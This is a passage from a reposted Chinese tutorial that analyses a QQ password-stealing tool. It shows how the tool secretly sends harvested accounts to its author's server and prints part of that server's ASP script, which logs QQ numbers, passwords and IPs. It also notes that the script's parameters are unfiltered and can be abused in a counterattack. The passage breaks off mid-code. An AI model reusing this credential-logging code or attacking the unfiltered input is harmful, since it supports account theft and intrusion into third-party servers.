找出安全漏洞 QQ盗号软件后门分析与反击

您当前位置:首页 > 红讯频道 > 网络技术

  • 红软基地 推荐
  • 2012-01-17
红软基地 www.rsdown.cn
WhN红软基地

  我们再用c32asm对他进行反汇编,搜索asp图9 WhN红软基地

 WhN红软基地

找出安全漏洞 QQ盗号软件后门分析与反击_网页教学网webjx.com转载WhN红软基地

  看到了什么 .刚才我是默认设置的应该是http://k.thec.cn/xieming/69q/qq.asp才对。,怎么会是http://langyeqq.cn/qq/newbacka.asp 这个呢!我们浏览看看 图10WhN红软基地

找出安全漏洞 QQ盗号软件后门分析与反击_网页教学网webjx.com转载WhN红软基地

  "pzQQ"看到了吧,说明就是他的盗号的,从这些可以确定,这个软件不但运行的时候施放一个木马,而且就连我们配置好的文件也被他留了后门,而作者就坐等着收号了。WhN红软基地

  后门反击战 作者:fhodWhN红软基地
WhN红软基地
  看到这..想必大家也和我一样非常气愤..难道我们就任由作者下去吗.当然不..现在我们就开始反击.WhN红软基地
WhN红软基地
  我们来看看qq.asp的代码WhN红软基地

  首先来看WhN红软基地
WhN红软基地
  strLogFile="Q7.txt"WhN红软基地
WhN红软基地
  这个是QQ接受文件..默认的是q7.txtWhN红软基地

  继续看代码WhN红软基地

QQNumber=request("QQNumber")WhN红软基地

QQPassWord=request("QQPassWord")WhN红软基地

QQclub=request("QQclub")WhN红软基地

QQip=request("QQip")WhN红软基地

  是没经过任何过滤的..这些参数的数据我们完全可以自定义WhN红软基地

  在往下看WhN红软基地

if QQNumber="" or QQPassWord="" thenWhN红软基地

response.write "pzQQ"WhN红软基地

response.endWhN红软基地

  假如QQNumber和QQPassWord的值为空就返回pzQQ .然后程序结束工作.. 只要这两个值不为空就继续执行下面的代码WhN红软基地

StrLogText =StrLogText&QQNumber&"----"&QQPassWord&"----会员:"& QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")WhN红软基地

StrLogText=StrLogText&")"WhN红软基地

红软基地 www.rsdown.cn

来源:红讯频道

专题合集 | 手机游戏 | 最近更新 | 下载排行 | 提交软件 | 在线病毒扫描 | 联系我们 | 版权声明 | 网站地图
Copyright ©2006-2013 红软基地(www.rsdown.cn). 湘ICP备2024053236号-1